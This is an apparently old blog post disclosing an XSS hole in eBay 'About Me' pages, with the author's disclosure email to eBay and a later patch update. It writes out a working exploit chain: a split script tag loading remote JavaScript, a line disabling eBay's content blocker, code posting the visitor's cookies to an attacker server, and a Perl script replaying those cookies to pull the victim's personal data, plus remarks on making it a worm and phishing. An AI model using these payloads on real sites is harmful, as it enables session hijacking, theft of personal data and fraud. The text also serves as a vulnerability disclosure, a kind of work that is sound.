Sometimes, when someone bugs you, you'll like to see how to bypass
the bugging. I am not alone in this, take for example,
BugMeNot
A few days ago, I had to figure out a way to put the right information at
an eBay About Me page concerning
an eBay store.
The easiest would be to redirect the user to the official website, yet
eBay doesn't allow that kind of JavaScript to be put on there. A link
could be put up, but that wouldn't be nice, for you'd force the user to
click on it, before showing the real content. Blocking the JavaScript
I "needed" was promising. How to bypass that? Soon I found out, but then
I figured more was probably possible.
Time to refresh my knowledge
and try a few things. An easy hack was to use this piece of code:
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://yourserver.com/evilness.js"></SCRIPT>
Now we could do a little more, the easy way. Including a JavaScript file
would speed up the whole debugging of the site. Too bad, a lot of stuff would
still be blocked, but that blocking was done by JavaScript itself!
Time to disable the block. So in my evilness.js I would start with:
ebay.oDocument._getControl("blockActiveContent").aBlocks = Array();
Now the active block content would be an empty array,
meaning, we can insert anything we like, like iframes,
document.cookie and everything. Yay!
So, why not grab the user's cookies and put that in a form?
document.write('<form action="http://yourserver.com/ebay.evilness.pl" ');
document.write('id="f" method="post"');
document.write('<input type="hidden" name="q" value="" id="q" />');
document.write('</form>');
var q = document.getElementById('q').value = document.cookie;
document.getElementById('f').submit();
Sweet, now the user will be submitting a form with his cookie contents
to us. Let's see if we can use that information! (Of course we can,
otherwise I wouldn't be blogging this ;-)
#!/usr/bin/perl
use strict;
use CGI qw/:standard/;
use LWP::Simple qw/$ua get/;
my $q = new CGI;
$ua->default_headers->push_header('Cookie' => $q->param('q'));
my $personal_info = get('http://my.ebay.com/ws/eBayISAPI.dll?'.
'MyeBay&CurrentPage=MyeBayPersonalInfo');
That's basically all it takes to retrieve the personal page of the user
who just fell in our trap. Using his cookies, we'll be served with all his
information (email address, street address, username etc). Of course we could
make this into a worm, by putting the little javascript form into the victim's
About Me page too.
I don't really care about all of this information, and for "the
good stuff" such as passwords and credit card info, you'd still need
the password of the user, but hey, we already have his full address
(usually with full name), his email address and username, so a phising
site is setup in seconds!
... I wonder how many people use the same password on eBay and PayPal ...
Note: all of this is created just for the fun of bypassing roadblocks,
and I expect eBay to terminate your account immediately after finding stuff
like this in you profile, so I do not advice you to use
such tactics! Another thing is that your "victim" has to be
logged in for this, but a lot of them will be.
Of course, I have contacted eBay on this exploit and wrote them the
following:
Dear sirs,
Recently I noticed I was able to use JavaScript on my 'About Me' page, using
a XSS tactic. This way, I was able to pass on cookies to a third party
server (mine in this matter) and use those cookies from there to
access information about the user account.
I have tested this setup as I describe here:
http://url and it does work flawlessly. I could gather username,
address, email info from my own account aswell as some friends'
accounts (with their coorperation and permission). I also think
I'd be able to make a worm out of this, infecting every visitor's
'About Me' page.
The solution, IMHO, is quite easy. Stop allowing JavaScript in the About
Me page and actually filter it out before you store it in the databases.
I would like to hear from you regarding this privacy matter and will not
post this blog entry (see URL above) as of yet, to prevent script kiddies
from abusing it. I will post it on Monday, leaving you with enough time
to contact me.
If you do need more time for patching the system, I'm willing to wait
even longer before posting the info on my blog.
Kind Regards,
How nice of me. But unfortunately, I haven't head from eBay so far, except
for scanning my system from a few different IP addresses. Now, according to
eBay time it's monday now, so let's unleash this information!
I really thought eBay would care enough about your privacy, yet they don't
even have the decency to email me ...
Update: After
publication on WebWereld, eBay finally deemed it necessary
to email me. They claim never to have received my initial email. Weird,
cause my website logs show me that at least 4 different IP addresses
have requested the "secret" URL I created for them. So I guess at least
four people didn't receive my email ...
This hole is patched for now, yet a simple alert('Hello World')
can still be posted, so JavaScript has not been disabled fully.
